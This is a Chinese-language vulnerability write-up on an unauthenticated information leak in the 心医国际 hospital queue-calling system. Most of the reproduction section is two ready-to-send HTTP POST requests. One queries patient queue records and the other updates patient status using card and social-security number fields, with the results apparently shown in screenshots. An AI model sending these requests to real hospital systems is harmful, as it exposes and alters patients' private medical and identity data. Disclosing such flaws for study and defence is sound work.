# 心医国际排队叫号系统敏感信息泄露 **一、漏洞简介** 心医国际是中国专业的医疗云应用解决方案提供商,铺建并运营全国领先的智能医疗云平台,依托十年的数据积累和业务实践,持续创新智能医疗场景应用。业务服务覆盖诊疗、教学、科研、管理等多维度,助力政府、医院及产业合作伙伴,打造线上线下高效协同的智慧医疗健康服务体系,目前已建成覆盖全国31个省,联结2万余家医疗机构的智能医疗云平台,助力建设并服务青海、河南、陕西、山西、贵州、新疆、江西、广西、甘肃9大省级远程医疗平台,服务通达80%全国三甲级医院;成功建设并服务全国300余个省、市、县及专科医联体。心医国际排队叫号系统存在未授权敏感信息泄露漏洞,攻击者可通过该漏洞获取系统敏感信息 **二、影响版本** 心医国际排队叫号系统 ![1714370825066-6953c7f5-fa94-4329-b1ec-f8ee12ee1f5c.png](./img/xLWT12YcmtcwVbvt/1714370825066-6953c7f5-fa94-4329-b1ec-f8ee12ee1f5c-885150.png) **三、漏洞复现** ```plain POST /showqueue/showqueue/patient/queryQueueInfo HTTP/1.1 Host: Accept: application/json, text/javascript, */*; q=0.01 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Connection: close Content-Length: 104 patientstatus=&queueID=&department=&waitarea=&name=&startTime=&endTime=&curPage=0&queueNumber=&operator= ``` ![1714361218056-eb624f8f-9644-4667-a379-e627e7f218c1.png](./img/xLWT12YcmtcwVbvt/1714361218056-eb624f8f-9644-4667-a379-e627e7f218c1-200892.png) ```plain POST /showqueue/showqueue/patient/statusUpdate HTTP/1.1 Host: Content-Length: 32 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Connection: close cardNo=1&cardType=out&socialNo=1 ``` ![1714374318126-38b39263-2da1-46fa-b16e-a346a57d686a.png](./img/xLWT12YcmtcwVbvt/1714374318126-38b39263-2da1-46fa-b16e-a346a57d686a-495915.png) > 更新: 2024-06-17 09:27:35 > 原文: